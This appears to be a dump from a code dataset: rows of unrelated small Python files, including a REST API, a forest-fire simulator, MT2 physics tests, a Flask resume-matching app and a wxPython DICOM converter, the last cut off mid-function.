max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
tangotest/__main__.py | tsoenen/tng-sdk-test | 0 | 12797951 | import argparse
from tangotest.tangotools import create_vnv_test
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Prepare tests for uploading to the V&V platform.')
parser.add_argument('tests_path', help='The path to the directory with test files')
parser.add_argument('ns_package_path', help='The path to the network service package')
parser.add_argument('-t', '--test_package_path', help='The path to generated output folder')
parser.add_argument('-p', '--probe_name', help='Probe name')
args = parser.parse_args()
create_vnv_test(**vars(args))
| 2.359375 | 2 |
api/states/apiviews.py | Mastersam07/ncovid-19-api | 17 | 12797952 | <reponame>Mastersam07/ncovid-19-api<gh_stars>10-100
from rest_framework import generics, viewsets
from rest_framework.generics import get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Data
from .serializers import StateSerializer # CaseSerializer
class StateList(APIView):
@staticmethod
def get(request):
states = Data.objects.all()
data = StateSerializer(states, many=True).data
return Response(data)
class StateDetail(APIView):
@staticmethod
def get(request, id):
state = get_object_or_404(Data, pk=id)
data = StateSerializer(state).data
return Response(data)
class StateViewSet(viewsets.ModelViewSet):
queryset = Data.objects.all()
serializer_class = StateSerializer
| 2.09375 | 2 |
python_parikshith21/Day46.py | 01coders/50-Days-Of-Code | 0 | 12797953 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 25 14:33:03 2019
@author: Parikshith.H
"""
import numpy as np
arr = np.array([[1, 5, 6],
[4, 7, 2],
[3, 1, 9]])
# maximum element of array
print ("Largest element is:", arr.max())
print ("Row-wise maximum elements:",
arr.max(axis = 1))
# minimum element of array
print ("Column-wise minimum elements:",
arr.min(axis = 0))
# =============================================================================
# #ouptut:
# Largest element is: 9
# Row-wise maximum elements: [6 7 9]
# Column-wise minimum elements: [1 1 2]
# =============================================================================
| 4 | 4 |
simulators/fires/UrbanForest.py | rptamin/ddrl-firefighting | 7 | 12797954 | <gh_stars>1-10
from collections import defaultdict
import itertools
import numpy as np
from simulators.fires.ForestElements import Tree, SimpleUrban
from simulators.Simulator import Simulator
class UrbanForest(Simulator):
"""
A simulator for a lattice-based forest with urban elements. Based on the LatticeForest simulator.
"""
def __init__(self, dimension, urban_width, rng=None, initial_fire=None,
alpha=None, beta=None, tree_model='exponential'):
# LatticeForest.__init__(self, dimension, rng=rng, initial_fire=initial_fire,
# alpha=alpha, beta=beta, tree_model=tree_model)
Simulator.__init__(self)
self.dims = (dimension, dimension) if isinstance(dimension, int) else dimension
if tree_model == 'exponential':
self.alpha = defaultdict(lambda: 0.2763) if alpha is None else alpha
elif tree_model == 'linear':
self.alpha = defaultdict(lambda: 0.2) if alpha is None else alpha
self.beta = defaultdict(lambda: np.exp(-1/10)) if beta is None else beta
self.rng = rng
self.random_state = np.random.RandomState(self.rng)
self.urban = []
self.urban_width = urban_width
# the forest is a group of Trees and SimpleUrban elements
self.group = dict()
for r in range(self.dims[0]):
for c in range(self.dims[1]):
# urban elements compose the right-most edge of the lattice
if c >= self.dims[1]-self.urban_width:
self.group[(r, c)] = SimpleUrban(self.alpha[(r, c)], self.beta[(r, c)], position=np.array([r, c]),
numeric_id=r*self.dims[1]+c)
self.urban.append((r, c))
# all other elements are trees
else:
self.group[(r, c)] = Tree(self.alpha[(r, c)], self.beta[(r, c)], position=np.array([r, c]),
numeric_id=r*self.dims[1]+c, model=tree_model)
if 0 <= r+1 < self.dims[0]:
self.group[(r, c)].neighbors.append((r+1, c))
if 0 <= r-1 < self.dims[0]:
self.group[(r, c)].neighbors.append((r-1, c))
if 0 <= c+1 < self.dims[1]:
self.group[(r, c)].neighbors.append((r, c+1))
if 0 <= c-1 < self.dims[1]:
self.group[(r, c)].neighbors.append((r, c-1))
self.stats_trees = np.zeros(3).astype(np.int)
self.stats_trees[0] += self.dims[0]*self.dims[1] - len(self.urban)
self.stats_urban = np.zeros(4).astype(np.int)
self.stats_urban[0] += len(self.urban)
# start initial fire
self.iter = 0
self.fires = []
self.initial_fire = initial_fire
self._start_fire()
self.early_end = False
self.end = False
return
def _start_fire(self):
"""
Helper method to specify initial fire locations in the forest.
"""
# apply initial condition if specified
if self.initial_fire is not None:
self.fires = self.initial_fire
for p in self.initial_fire:
self.group[p].set_on_fire()
if isinstance(self.group[p], Tree):
self.stats_trees[0] -= 1
self.stats_trees[1] += 1
elif isinstance(self.group[p], SimpleUrban):
self.stats_urban[0] -= 1
self.stats_urban[1] += 1
return
# start a 4x4 square of fires at center
# if forest size is too small, start a single fire at the center
r_center = np.floor((self.dims[0]-1)/2).astype(np.uint8)
c_center = np.floor((self.dims[1]-1)/2).astype(np.uint8)
delta_r = [0] if self.dims[0]<4 else [k for k in range(-1, 3)]
delta_c = [0] if self.dims[1]<4 else [k for k in range(-1, 3)]
deltas = itertools.product(delta_r, delta_c)
for (dr, dc) in deltas:
r, c = r_center+dr, c_center+dc
self.fires.append((r, c))
self.group[(r, c)].set_on_fire()
if isinstance(self.group[(r, c)], Tree):
self.stats_trees[0] -= 1
self.stats_trees[1] += 1
elif isinstance(self.group[(r, c)], SimpleUrban):
self.stats_urban[0] -= 1
self.stats_urban[1] += 1
return
def reset(self):
"""
Reset the simulation object to its initial configuration.
"""
# reset statistics
self.stats_trees = np.zeros(3).astype(np.int)
self.stats_trees[0] += self.dims[0]*self.dims[1] - len(self.urban)
self.stats_urban = np.zeros(4).astype(np.int)
self.stats_urban[0] += len(self.urban)
# reset elements
for element in self.group.values():
element.reset()
# reset to initial condition
self.iter = 0
self.fires = []
self._start_fire()
self.random_state = np.random.RandomState(self.rng)
self.end = False
self.early_end = False
return
def dense_state(self):
"""
Creates a representation of the state of each Tree.
:return: 2D numpy array where each position (row, col) corresponds to a Tree state
"""
return np.array([[self.group[(r, c)].state for c in range(self.dims[1])]
for r in range(self.dims[0])])
def update(self, control=None):
"""
Update the simulator one time step.
:param control: collection to map (row, col) to control for each Element,
which is a tuple of (delta_alpha, delta_beta)
"""
if self.end:
print("fire extinguished")
return
if control is None:
control = defaultdict(lambda: (0, 0))
# assume that the fire cannot spread further this step,
# which occurs when no healthy Trees have a neighbor that is on fire
self.early_end = True
# list of (row, col) positions corresponding to elements caught on fire this time step
add = []
# list of (row, col) positions corresponding to healthy elements that have been sampled to determine
# if they will catch on fire
checked = []
# calculate next state for urban elements not on fire, in case they are removed from the lattice
do_not_check = []
for u in self.urban:
if self.group[u].is_healthy(self.group[u].state):
self.group[u].next(self.group, control[u], self.random_state)
if self.group[u].is_removed(self.group[u].next_state):
self.stats_urban[0] -= 1
self.stats_urban[3] += 1
do_not_check.append(u)
# fire spreading check:
# iterate over current fires, find their neighbors that are healthy, and sample
# to determine if the healthy element catches on fire
for f in self.fires:
for fn in self.group[f].neighbors:
if fn not in checked and self.group[fn].is_healthy(self.group[fn].state):
if isinstance(self.group[fn], SimpleUrban) and fn in do_not_check:
continue
self.early_end = False
# calculate next state
self.group[fn].next(self.group, control[fn], self.random_state)
if self.group[fn].is_on_fire(self.group[fn].next_state):
add.append(fn)
checked.append(fn)
# determine if the current element on fire will extinguish this time step
self.group[f].next(self.group, control[f], self.random_state)
if self.group[f].is_burnt(self.group[f].next_state):
if isinstance(self.group[f], Tree):
self.stats_trees[1] -= 1
self.stats_trees[2] += 1
elif isinstance(self.group[f], SimpleUrban):
self.stats_urban[1] -= 1
self.stats_urban[2] += 1
# apply next state to all elements
for element in self.group.values():
element.update()
# retain elements that are still on fire
self.fires = [f for f in self.fires if self.group[f].is_on_fire(self.group[f].state)]
# add elements that caught on fire
self.fires.extend(add)
for a in add:
if isinstance(self.group[a], Tree):
self.stats_trees[0] -= 1
self.stats_trees[1] += 1
elif isinstance(self.group[a], SimpleUrban):
self.stats_urban[0] -= 1
self.stats_urban[1] += 1
self.iter += 1
if not self.fires:
self.early_end = True
self.end = True
return
return
| 2.8125 | 3 |
scrabbler/__init__.py | astralcai/scrabble-solver | 3 | 12797955 | <reponame>astralcai/scrabble-solver
from scrabbler.scrabbler import Game
| 0.953125 | 1 |
bin/ColorBoard.py | hfally/mysql-autorestore | 0 | 12797956 | colors = {
'HEADER' : '\033[95m',
'OKBLUE' : '\033[94m',
'OKGREEN' : '\033[0;32m',
'YELLOW' : '\033[0;33m',
'FAIL' : '\033[31m',
'ENDC' : '\033[0m',
'BOLD' : '\033[1m',
'UNDERLINE' : '\033[4m',
'BGRED' : '\033[41;37m'
}
# Handle coloration
def colorize(string, color):
return colors[color.upper()] + string + colors['ENDC']
| 3.03125 | 3 |
code-lab/blender/active_object_bbox_loc_rot_dimension.py | kant/AI-Resources | 0 | 12797957 | <gh_stars>0
"""Get the location, rotation(radian) and dimension of selected object bounding box.
References
- https://blender.stackexchange.com/questions/14070/create-and-export-bounding-boxes-for-objects
"""
import bpy
selected = bpy.context.selected_objects
for obj in selected:
#ensure origin is centered on bounding box center
bpy.ops.object.origin_set(type='ORIGIN_GEOMETRY', center='BOUNDS')
#create a cube for the bounding box
bpy.ops.mesh.primitive_cube_add()
#our new cube is now the active object, so we can keep track of it in a variable:
bound_box = bpy.context.active_object
bpy.context.active_object.display_type = 'WIRE'
#copy transforms
bound_box.dimensions = obj.dimensions
bound_box.location = obj.location
bound_box.rotation_euler = obj.rotation_euler
print(obj.dimensions)
print(obj.location)
print(obj.rotation_euler)
| 2.890625 | 3 |
example/docs/conf.py | zenitysec/sphinx-rego | 13 | 12797958 | project = 'sphinx-rego example'
copyright = '2021, sphinx-rego'
author = 'sphinx-rego'
release = '1'
extensions = ["sphinxrego.ext"]
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
html_theme = 'alabaster'
| 0.9375 | 1 |
python-libs/histogram.py | bilbopingouin/simple-stats-tools | 0 | 12797959 | # This create an array to plot an histogram as
# ^
# | +-+
# | +-+ | +-+
# | | | +-+ |
# | +-+ | | | +-+
# | | | | | | | +-+
# +---+-+-+-+-+-+-+-+------->
# Vm Vmax
class histogram:
def __init__(self, vmin, vmax, nbins):
self.init_values(vmin, vmax, nbins)
def init_values(self, vmin, vmax, nbins):
self.array = [0] * nbins
self.min = vmin
self.max = vmax
self.step = float(vmax-vmin)/float(nbins)
def add_value(self, v):
if v > self.min and v < self.max:
bin_idx = int(((v-self.min)-(v-self.min) % self.step)/(self.step))
self.array[bin_idx] += 1
def print_array(self):
print(self.array)
def print(self):
for i in range(len(self.array)):
print(i*self.step+0.5*self.step+self.min, self.array[i])
| 3.84375 | 4 |
app.py | manojvirat457/Resume-Matching | 0 | 12797960 | # from scripts import tabledef
# from scripts import forms
# from scripts import helpers
from flask import Flask, redirect, url_for, render_template, request, session
import json
import sys
import os
# import stripe
import pandas as pd
from werkzeug.utils import secure_filename
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.feature_extraction.text import CountVectorizer
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import pandas as pd
import jieba
import jieba.analyse
import csv
import ast
import sys
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import XMLConverter, HTMLConverter, TextConverter
from pdfminer.layout import LAParams
import io
app = Flask(__name__)
# app.secret_key = os.urandom(12) # Generic key for dev purposes only
# stripe_keys = {
# 'secret_key': os.environ['secret_key'],
# 'publishable_key': os.environ['publishable_key']
# }
# stripe.api_key = stripe_keys['secret_key']
# Heroku
#from flask_heroku import Heroku
#heroku = Heroku(app)
# ======== Routing =========================================================== #
# -------- Login ------------------------------------------------------------- #
@app.route('/', methods=['GET', 'POST'])
def login():
# creating a pdf file object
basepath = os.path.dirname(__file__)
file_path = os.path.join(basepath, 'uploads', 'sample.pdf')
fp = open(file_path, 'rb')
rsrcmgr = PDFResourceManager()
retstr = io.StringIO()
laparams = LAParams()
device = TextConverter(rsrcmgr, retstr, laparams=laparams)
# Create a PDF interpreter object.
interpreter = PDFPageInterpreter(rsrcmgr, device)
# Process each page contained in the document.
for page in PDFPage.get_pages(fp):
interpreter.process_page(page)
data = retstr.getvalue()
print(data)
return render_template('home.html', user="manoj")
# return text
def getFile():
Tk().withdraw()
filename = askopenfilename()
Tk.close()
return filename
@app.route("/logout")
def logout():
session['logged_in'] = False
return redirect(url_for('login'))
@app.route('/predict', methods=['GET', 'POST'])
def upload():
if request.method == 'GET':
# f = request.files['file']
basepath = os.path.dirname(__file__)
# file_path = os.path.join(
# basepath, 'uploads', secure_filename(f.filename))
# f.save(file_path)
file_path = os.path.join(basepath, 'uploads', 'test-upload.csv')
df = pd.read_csv(file_path)
seg_list01 = df['job-description']
seg_list02 = df['your-resume']
item01_list = seg_list01
item01 = ','.join(item01_list)
item02_list = seg_list02
item02 = ','.join(item02_list)
documents = [item01, item02]
count_vectorizer = CountVectorizer()
sparse_matrix = count_vectorizer.fit_transform(documents)
doc_term_matrix = sparse_matrix.todense()
df = pd.DataFrame(doc_term_matrix,
columns=count_vectorizer.get_feature_names(),
index=['item01', 'item02'])
df.to_csv(os.path.join(basepath, 'uploads', 'result.csv'))
read_file = pd.read_csv(os.path.join(basepath, 'uploads',
'result.csv'))
read_file.to_excel(os.path.join(basepath, 'uploads', 'result.xlsx'),
index=None,
header=True)
answer = cosine_similarity(df, df)
print("CSV Created Successfully")
answer = pd.DataFrame(answer)
answer = answer.iloc[[1], [0]].values[0]
answer = round(float(answer), 4) * 100
return "Your resume matched " + str(
answer) + " %" + " of the job-description!"
return None
# ======== Main ============================================================== #
if __name__ == "__main__":
app.run(debug=True, use_reloader=True) | 1.875 | 2 |
strategist/tests/factories.py | OpenMatchmaking/microservice-strategist | 0 | 12797961 | from uuid import uuid4
def generate_player_data(event_name, rating):
return {
"id": str(uuid4()),
"response-queue": "{}-response-queue".format(str(uuid4())),
"event-name": event_name,
"detail": {
"rating": rating,
"content": {}
}
}
| 2.625 | 3 |
tests/test_mt2_tombs.py | tpgillam/mt2 | 3 | 12797962 | """Tests for the variant of MT2 by <NAME>."""
from typing import Optional, Union
import numpy
import pytest
from .common import mt2_lester, mt2_tombs
def test_simple_example():
computed_val = mt2_tombs(100, 410, 20, 150, -210, -300, -200, 280, 100, 100)
assert computed_val == pytest.approx(412.628)
def test_near_massless():
# This test is based on Fig 5 of https://arxiv.org/pdf/1411.4312.pdf
m_vis_a = 0
px_a = -42.017340486
py_a = -146.365340528
m_vis_b = 0.087252259
px_b = -9.625614206
py_b = 145.757295514
px_miss = -16.692279406
py_miss = -14.730240471
chi_a = 0
chi_b = 0
computed_val = mt2_tombs(
m_vis_a, px_a, py_a, m_vis_b, px_b, py_b, px_miss, py_miss, chi_a, chi_b
)
assert computed_val == pytest.approx(0.09719971)
def test_fuzz():
batch_size = 100
num_tests = 1000
numpy.random.seed(42)
def _random_batch(min_, max_):
return numpy.random.uniform(min_, max_, (batch_size,))
for _ in range(num_tests):
m_vis_1 = _random_batch(0, 100)
px_vis_1 = _random_batch(-100, 100)
py_vis_1 = _random_batch(-100, 100)
m_vis_2 = _random_batch(0, 100)
px_vis_2 = _random_batch(-100, 100)
py_vis_2 = _random_batch(-100, 100)
px_miss = _random_batch(-100, 100)
py_miss = _random_batch(-100, 100)
m_invis_1 = _random_batch(0, 100)
m_invis_2 = _random_batch(0, 100)
args = (
m_vis_1,
px_vis_1,
py_vis_1,
m_vis_2,
px_vis_2,
py_vis_2,
px_miss,
py_miss,
m_invis_1,
m_invis_2,
)
result_lester = mt2_lester(*args)
result_tombs = mt2_tombs(*args)
numpy.testing.assert_allclose(result_lester, result_tombs, rtol=1e-12)
def test_scale_invariance():
example_args = numpy.array((100, 410, 20, 150, -210, -300, -200, 280, 100, 100))
example_val = mt2_tombs(*example_args)
# mt2 scales with its arguments; check over some orders of magnitude.
for i in range(-100, 100, 10):
scale = 10.0 ** i
with numpy.errstate(over="ignore"):
# Suppress overflow warnings when performing the evaluation; we're happy
# so long as we match approximately in the test below.
computed_val = mt2_tombs(*(example_args * scale))
assert computed_val == pytest.approx(example_val * scale)
def test_negative_masses():
# Any negative mass is unphysical.
# These arguments use negative masses to make both initial bounds negative.
# Check that the result is neither positive nor an infinite loop.
computed_val = mt2_tombs(1, 2, 3, 4, 5, 6, 7, 8, -90, -100)
assert not (computed_val > 0)
| 2.515625 | 3 |
ex092.py | raphael-abrantes/exercises-python | 0 | 12797963 | from datetime import datetime
pessoa = dict()
anohoje = datetime.now().year
pessoa['nome'] = str(input('Informe o nome: ')).strip().title()
nasc = int(input('Informe o ano de nascimento: '))
pessoa['idade'] = anohoje - nasc
pessoa['ctps'] = int(input('Informe a CTPS (0 se não tiver): '))
if pessoa['ctps'] != 0:
pessoa['contratacao'] = int(input('Informe o ano de contratação: '))
pessoa['salario'] = float(input('Informe o salário: '))
faltam = 35 - (anohoje - pessoa['contratacao'])
pessoa['aposentar'] = pessoa['idade'] + faltam
print('-='*15)
for k, v in pessoa.items():
print(f' - {k} tem o valor {v}')
| 3.671875 | 4 |
multithread/mtfacfib.py | hero0926/PythonPlayground | 0 | 12797964 | # 싱글 스레드랑 멀티 스레드 비교하기
from myThread import MyThread
from time import ctime, sleep
# 피보나치, 팩토리얼, 합계를 싱글스레드랑 멀티스레드에서 실행시켜 보았다.
def fib(x) :
sleep(0.005)
if x<2 : return 1
return (fib(x-2)+fib(x-1))
def fac(x) :
sleep(0.1)
if x<2 : return 1
refutn (x*(fac(x-1))
def sum(x) :
sleep(0.1)
if x<2 : return 1
return (x+sum(x-1))
funcs = (fib, fac, sum)
n = 12
def main() :
nfuncs = range(len(funcs))
print' 싱글스레드'
for i in nfuncs :
print ' starting', funcs[i].__name__, 'at : ', ctime()
print funcs[i](n)
print funcs[i].__name__, 'finished at :', ctime()
print '멀티스레드 '
threads = []
for i in nfuncs :
t = MyThread(funcs[i], (n,), funcs[i].__name__)
threads.append(t)
for i in nfuncs :
threads[i].start()
for i in nfuncs :
threads[i].join()
print threads[i].getResult()
print 'all DONE'
if __name__ == '__main__' :
main()
| 3.84375 | 4 |
pyDcmConverter/dicomgui.py | ChenglongWang/pythonDicomConverter | 4 | 12797965 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# dicomgui.py
"""Main app file that convert DICOM data via a wxPython GUI dialog."""
# Copyright (c) 2018-2020 <NAME>
# Copyright (c) 2009-2017 <NAME>
# Copyright (c) 2009 <NAME>
# This file is part of dicompyler, released under a BSD license.
# See the file license.txt included with this distribution, also
# available at https://github.com/bastula/dicompyler/
#
# It's assumed that the reference (prescription) dose is in cGy.
import hashlib, os, threading, functools, json, warnings
from logging import getLogger, DEBUG, INFO
logger = getLogger('DcmConverter')
import wx
warnings.filterwarnings("ignore", category=wx.wxPyDeprecationWarning)
from wx.xrc import *
import numpy as np
from dicompylercore import dicomparser
from pyDcmConverter import guiutil, util
class DcmConverterApp(wx.App):
"""Prepare to show the dialog that will Import DICOM and DICOM RT files."""
def OnInit(self):
wx.GetApp().SetAppName("DicomConverter")
# Load the XRC file for our gui resources
self.res = XmlResource(util.GetResourcePath('dicomgui.xrc'))
dlgDicomImporter = self.res.LoadDialog(None, "DicomImporterDialog")
dlgDicomImporter.Init(self.res)
# Show the dialog and return the result
ret = dlgDicomImporter.ShowModal()
# Save configure
conf = {}
with open('.dcmconverter.conf', 'w') as f:
conf['path'] = dlgDicomImporter.path
conf['only_export_voldata'] = dlgDicomImporter.only_export_voldata
conf['min_slice_num'] = dlgDicomImporter.min_slice_num
conf['offset'] = dlgDicomImporter.offset
conf['export_mori_format'] = dlgDicomImporter.export_mori_format
conf['export_nii_format'] = dlgDicomImporter.export_nii_format
conf['output_dir'] = dlgDicomImporter.output_dir
conf['output_name'] = dlgDicomImporter.output_name
json.dump(conf, f, indent=2, sort_keys=True)
# Block until the thread is done before destroying the dialog
if dlgDicomImporter:
if hasattr(dlgDicomImporter, 't'):
dlgDicomImporter.t.join()
dlgDicomImporter.Destroy()
os.sys.exit(0)
return 1
class DicomImporterDialog(wx.Dialog):
"""Import DICOM RT files and return a dictionary of data."""
def __init__(self):
wx.Dialog.__init__(self)
def Init(self, res):
"""Method called after the panel has been initialized."""
# Set window icon
if not guiutil.IsMac():
self.SetIcon(guiutil.get_icon())
# Initialize controls
self.txtDicomImport = XRCCTRL(self, 'txtDicomImport')
self.btnDicomImport = XRCCTRL(self, 'btnDicomImport')
self.btnPause = XRCCTRL(self, 'btn_pause')
self.checkSearchSubfolders = XRCCTRL(self, 'checkSearchSubfolders')
self.lblProgressLabel = XRCCTRL(self, 'lblProgressLabel')
self.lblProgress = XRCCTRL(self, 'lblProgress')
self.gaugeProgress = XRCCTRL(self, 'gaugeProgress')
self.lblProgressPercent = XRCCTRL(self, 'lblProgressPercent')
self.lblProgressPercentSym = XRCCTRL(self, 'lblProgressPercentSym')
self.tcPatients = XRCCTRL(self, 'tcPatients')
self.bmpRxDose = XRCCTRL(self, 'bmpRxDose')
self.lblRxDose = XRCCTRL(self, 'lblRxDose')
self.txtRxDose = XRCCTRL(self, 'txtRxDose')
self.lblRxDoseUnits = XRCCTRL(self, 'lblRxDoseUnits')
# Bind interface events to the proper methods
self.Bind(wx.EVT_BUTTON, self.OnBrowseDicomImport, id=XRCID('btnDicomImport'))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckSearchSubfolders, id=XRCID('checkSearchSubfolders'))
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelectTreeItem, id=XRCID('tcPatients'))
#self.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnOK, id=XRCID('tcPatients'))
#added by CL.Wang
self.Bind(wx.EVT_CHECKBOX, self.OnCheckVolFlag, id=XRCID('check_volume'))
self.Bind(wx.EVT_SPINCTRL, self.OnSpinSliceNum, id=XRCID('spin_minslices'))
self.Bind(wx.EVT_SPINCTRL, self.OnSpinOffset, id=XRCID('spin_offset'))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckMoriFormat, id=XRCID('check_mori'))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckNiftiFormat, id=XRCID('check_nifti'))
self.Bind(wx.EVT_DIRPICKER_CHANGED, self.OnPickOutdir, id=XRCID('picker_output'))
self.Bind(wx.EVT_TEXT, self.OnInputName, id=XRCID('text_output_name'))
self.Bind(wx.EVT_BUTTON, self.OnConvert, id=XRCID('btn_convert'))
self.Bind(wx.EVT_BUTTON, self.OnPause, id=XRCID('btn_pause'))
self.Bind(wx.EVT_BUTTON, self.OnRescan, id=XRCID('btn_rescan'))
# Init variables
if os.path.isfile('.dcmconverter.conf'):
logger.info('Loading previous configuration...')
with open('.dcmconverter.conf', 'r') as f:
conf = json.load(f)
self.path = conf['path']
self.txtDicomImport.SetValue(self.path)
self.only_export_voldata = conf['only_export_voldata']
XRCCTRL(self, 'check_mori').SetValue(self.only_export_voldata)
self.min_slice_num = conf['min_slice_num']
XRCCTRL(self, 'spin_minslices').SetValue(self.min_slice_num)
self.offset = conf['offset']
XRCCTRL(self, 'spin_offset').SetValue(self.offset)
self.export_mori_format = conf['export_mori_format']
XRCCTRL(self, 'check_mori').SetValue(self.export_mori_format)
self.export_nii_format = conf['export_nii_format']
XRCCTRL(self, 'check_nifti').SetValue(self.export_nii_format)
self.output_dir = conf['output_dir']
XRCCTRL(self, 'picker_output').SetPath(self.output_dir)
self.output_name = conf['output_name']
XRCCTRL(self, 'text_output_name').SetValue(self.output_name)
else:
self.path = os.path.expanduser('~')
self.only_export_voldata = XRCCTRL(self, 'check_volume').IsChecked()
self.min_slice_num = int(XRCCTRL(self, 'spin_minslices').GetValue())
self.offset = int(XRCCTRL(self, 'spin_offset').GetValue())
self.export_mori_format = XRCCTRL(self, 'check_mori').IsChecked()
self.export_nii_format = XRCCTRL(self, 'check_nifti').IsChecked()
self.output_dir = ''
self.output_name = ''
# Set the dialog font and bold the font of the directions label
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
if guiutil.IsMac():
self.txtDicomImport.SetFont(font)
self.btnDicomImport.SetFont(font)
self.checkSearchSubfolders.SetFont(font)
self.lblProgressLabel.SetFont(font)
self.lblProgress.SetFont(font)
self.lblProgressPercent.SetFont(font)
self.lblProgressPercentSym.SetFont(font)
self.tcPatients.SetFont(font)
self.txtRxDose.SetFont(font)
self.lblRxDoseUnits.SetFont(font)
font.SetWeight(wx.FONTWEIGHT_BOLD)
self.lblRxDose.SetFont(font)
# Initialize the patients tree control
self.root = self.InitTree()
# Initialize the patients dictionary
self.patients = {}
# Search subfolders by default
self.import_search_subfolders = True
# Set the threading termination status to false intially
self.terminate = False
# Hide the progress bar until it needs to be shown
self.gaugeProgress.Show(False)
self.lblProgressPercent.Show(False)
self.lblProgressPercentSym.Show(False)
# Start the directory search as soon as the panel loads
#self.OnDirectorySearch()
def OnRescan(self, evt):
self.OnDirectorySearch()
def OnPause(self, evt):
self.terminate = True
def OnSpinOffset(self, evt):
self.offset = evt.GetPosition()
def OnCheckVolFlag(self, evt):
self.only_export_voldata = evt.IsChecked()
try:
self.Check_Export_Files()
except:
logger.info('Adjusted parameters befor the tree generated.')
def OnSpinSliceNum(self, evt):
self.min_slice_num = evt.GetPosition()
try:
self.Check_Export_Files()
except:
logger.info('Adjusted parameters befor the tree generated.')
def OnCheckMoriFormat(self, evt):
self.export_mori_format = evt.IsChecked()
def OnCheckNiftiFormat(self, evt):
self.export_nii_format = evt.IsChecked()
def OnPickOutdir(self, evt):
self.output_dir = evt.GetPath()
def OnInputName(self, evt):
self.output_name = evt.GetString()
def AlertDialog(self, msg):
dialog = wx.MessageDialog(self, msg, 'Error', style=wx.OK)
dialog.ShowModal()
dialog.Destroy()
def ChoiceDialog(self, msg):
dialog = wx.MessageDialog(self, msg, 'Warning', style=wx.OK_DEFAULT|wx.CANCEL)
self.contiune_export = dialog.ShowModal()
dialog.Destroy()
def __GetNiftiAffineMatrix__(self, dp):
di = float(dp.ds.PixelSpacing[0])
dj = float(dp.ds.PixelSpacing[1])
orientation = dp.ds.ImageOrientationPatient
dk = float(dp.ds.SliceThickness)
m = np.array(
[[float(orientation[0])*di, float(orientation[3])*dj, 0, 0],
[float(orientation[1])*di, float(orientation[4])*dj, 0, 0],
[float(orientation[2])*di, float(orientation[5])*dj, dk, 0],
[0, 0, 0, 1]], dtype=np.float)
return m
def ExportFunc(self, out_basepath, patient_data, progressFunc=None):
if patient_data is None:
return
# Existence check
if self.export_mori_format:
out_dir = os.path.join(os.path.dirname(out_basepath), 'LabFormat')
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
mori_fname = os.path.join(out_dir, os.path.basename(out_basepath))
if os.path.isfile(mori_fname+'.raw.gz'):
self.ChoiceDialog('File existed! Continue?')
if self.contiune_export != wx.ID_OK:
return
if self.export_nii_format:
out_dir = os.path.join(os.path.dirname(out_basepath), 'NiftiFormat')
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
nii_fname = os.path.join(out_dir, os.path.basename(out_basepath)+'.nii.gz')
if os.path.isfile(nii_fname):
self.ChoiceDialog('File existed! Continue?')
if self.contiune_export != wx.ID_OK:
return
dp = dicomparser.DicomParser(patient_data['images'][0])
reso = [ float(dp.ds.PixelSpacing[0]), float(dp.ds.PixelSpacing[1]), float(dp.ds.SliceThickness)]
affine = self.__GetNiftiAffineMatrix__(dp)
conv_kernel, hospital, kvp, model_name = dp.ds.ConvolutionKernel, dp.ds.InstitutionName, dp.ds.KVP, dp.ds.ManufacturerModelName
img_ori, pat_ori, pat_pos = np.array(dp.ds.ImageOrientationPatient), dp.ds.PatientOrientation, dp.ds.PatientPosition
study_date, serise_date, acq_date = dp.ds.StudyDate, dp.ds.SeriesDate, dp.ds.AcquisitionDate
if (dp.ds.SamplesPerPixel > 1) or (dp.ds.PhotometricInterpretation == 'RGB'):
logger.info('Cannot handle color image!')
return
if dp.ds.BitsAllocated == 16:
image_array = np.zeros([dp.ds.Rows, dp.ds.Columns, len(patient_data['images'])]).astype(np.int16)
elif dp.ds.BitsAllocated == 32:
image_array = np.zeros([dp.ds.Rows, dp.ds.Columns, len(patient_data['images'])]).astype(np.int32)
elif dp.ds.BitsAllocated == 8:
image_array = np.zeros([dp.ds.Rows, dp.ds.Columns, len(patient_data['images'])]).astype(np.int8)
else:
image_array = np.zeros([dp.ds.Rows, dp.ds.Columns, len(patient_data['images'])])
pos = []
for i, img in enumerate(patient_data['images']):
dp = dicomparser.DicomParser(img)
intercept, slope = dp.GetRescaleInterceptSlope()
pos.append(dp.ds.ImagePositionPatient[2])
pixel_array = dp.ds.pixel_array
rescaled_image = pixel_array * slope + intercept + self.offset
image_array[:,:,i] = rescaled_image
wx.CallAfter(progressFunc, (i+image_array.shape[-1])//2, image_array.shape[-1]+1, 'Creating image array...')
image_array = np.transpose(image_array, (1,0,2))
if self.export_mori_format:
from utils_cw import write_mori, get_mori_header_fields
logger.info('Exporting image to %s', mori_fname)
header_name = write_mori(image_array, reso, mori_fname, True)
with open(header_name, 'r') as f:
origin_header_lines = f.read().splitlines()
with open(header_name, 'w') as f:
for field in origin_header_lines: # \r\n
if 'Thickness' in field:
f.write('{} {:.6f}\r'.format(field,reso[2]))
elif 'ImagePositionBegin' in field:
f.write('{} {:.6f}\r'.format(field,np.min(pos)))
elif 'ImagePositionEnd' in field:
f.write('{} {:.6f}\r'.format(field,np.max(pos)))
elif 'Hospital' in field:
f.write('{} {}\r'.format(field,hospital))
elif 'KVP' in field:
f.write('{} {}\r'.format(field,kvp))
elif 'KernelFunction' in field:
